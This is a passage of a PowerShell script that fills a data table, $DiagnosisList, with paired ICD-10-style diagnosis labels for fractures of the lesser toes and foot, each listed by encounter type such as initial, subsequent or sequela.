$DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of left lesser toe(s)","Nondisplaced unspecified fracture of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced unspecified fracture of unspecified lesser toe(s)","Nondisplaced unspecified fracture of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of right lesser toe(s)","Displaced fracture of proximal phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of left lesser toe(s)","Displaced fracture of proximal phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal phalanx of unspecified lesser toe(s)","Displaced fracture of proximal phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of right lesser toe(s)","Nondisplaced fracture of proximal phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of left lesser toe(s)","Nondisplaced fracture of proximal phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of proximal phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of right lesser toe(s)","Displaced fracture of middle phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of left lesser toe(s)","Displaced fracture of middle phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle phalanx of unspecified lesser toe(s)","Displaced fracture of middle phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of right lesser toe(s)","Nondisplaced fracture of middle phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of left lesser toe(s)","Nondisplaced fracture of middle phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle phalanx of unspecified lesser toe(s)","Nondisplaced fracture of middle phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of right lesser toe(s)","Displaced fracture of distal phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of left lesser toe(s)","Displaced fracture of distal phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal phalanx of unspecified lesser toe(s)","Displaced fracture of distal phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of right lesser toe(s)","Nondisplaced fracture of distal phalanx of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of left lesser toe(s)","Nondisplaced fracture of distal phalanx of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal phalanx of unspecified lesser toe(s)","Nondisplaced fracture of distal phalanx of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right lesser toe(s)","Other fracture of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lesser toe(s)","Other fracture of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lesser toe(s)","Other fracture of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of right foot","Other fracture of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left foot","Other fracture of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified foot","Other fracture of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right foot","Unspecified fracture of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left foot","Unspecified fracture of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left 